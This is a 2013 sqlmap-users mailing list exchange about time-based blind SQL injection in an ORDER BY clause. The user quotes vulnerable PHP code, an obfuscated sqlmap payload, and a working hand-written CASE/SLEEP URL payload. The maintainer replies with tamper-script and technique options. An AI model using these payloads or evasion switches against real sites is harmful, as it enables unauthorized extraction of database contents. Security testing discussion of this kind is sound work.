Re: [sqlmap-users] exp blind

Thu, 21 Feb 2013 09:19:17 -0800 

Hi.

You haven't told anything that could help. Neither switches/options used,
neither tamper scripts used, nothing.

You are using some custom tamper script(s) as I can see "/*!50000" in
payload (we don't have this in our tamper scripts).

Nevertheless, I've tried to reproduce your run with --technique=T
--tamper="between,versionedmorekeywords,ifnull2ifisnull"
--dbs against our testing environment and everything works out of box.

Kind regards,
Miroslav Stampar

On Thu, Feb 21, 2013 at 5:22 PM, Кирилл Бельков <lir...@gmail.com> wrote:

> Hello, all.
>
> I'm trying to exploit the blind injection in the following query:
>
> $var = $_GET['var'];
> SELECT id,name FROM people ORDER BY $var
>
> sqlmap find vulnerabilities, but can not be used.
>
> sqmap sends the following query:
>
> name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
> IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
> 1),SLEEP(5),561)
>
> [22:20:36] [ERROR] unable to retrieve the number of databases
>
> but it does not work. May interfere with some kind of filter.
>
> But my request in browser url:
>
> index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
> /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
> sleep(10) ELSE date END
>
> It takes a successful ... How can I get sqlmap use my method of attack from
> the one it uses by default.
>
> Sincerely, Kirill
>
> p.s. sorry for my bad english
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://p.sf.net/sfu/appdyn_d2d_feb
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to